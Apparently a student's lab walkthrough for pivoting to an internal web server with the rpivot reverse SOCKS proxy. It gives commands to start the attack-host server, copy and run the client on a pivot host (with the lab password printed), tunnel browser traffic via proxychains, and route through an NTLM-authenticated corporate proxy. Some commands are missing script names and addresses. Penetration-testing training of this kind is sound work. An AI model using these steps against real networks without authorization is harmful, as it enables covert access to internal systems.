Skip to content

Web Server Pivoting with Rpivot

Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. Rpivot binds a machine inside a corporate network to an external server and exposes the client's local port on the server-side. We will take the scenario below, where we have a web server on our internal network (, and we want to access that using the rpivot proxy.

tmux setup

tmux setenv PIVOT_HOST_IP
tmux setenv ATTACK_HOST_IP

Step 1

Cloning rpivot

git clone

Step 2

Running from the Attack Host

python2.7 --proxy-port 9050 --server-port 9999 --server-ip $ATTACK_HOST_IP

Step 3

Transfering rpivot to the Target

scp -r rpivot ubuntu@$PIVOT_HOST_IP:/home/ubuntu/
|<- HTB_@cademy_stdnt!

Connect to Pivot Host

ssh ubuntu@$PIVOT_HOST_IP
|<- HTB_@cademy_stdnt!

Running from Pivot Target

python2.7 --server-ip <ATTACK_HOST_IP> --server-port 9999

Step 4

We will configure proxychains to pivot over our local server on on our attack host, which was initially started by the Python server.

Step 5

Browsing to the Target Webserver using Proxychains

proxychains firefox-esr


Similar to the pivot proxy above, there could be scenarios when we cannot directly pivot to an external server (attack host) on the cloud. Some organizations have HTTP-proxy with NTLM authentication configured with the Domain Controller. In such cases, we can provide an additional NTLM authentication option to rpivot to authenticate via the NTLM proxy by providing a username and password. In these cases, we could use rpivot's in the following way:

python --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>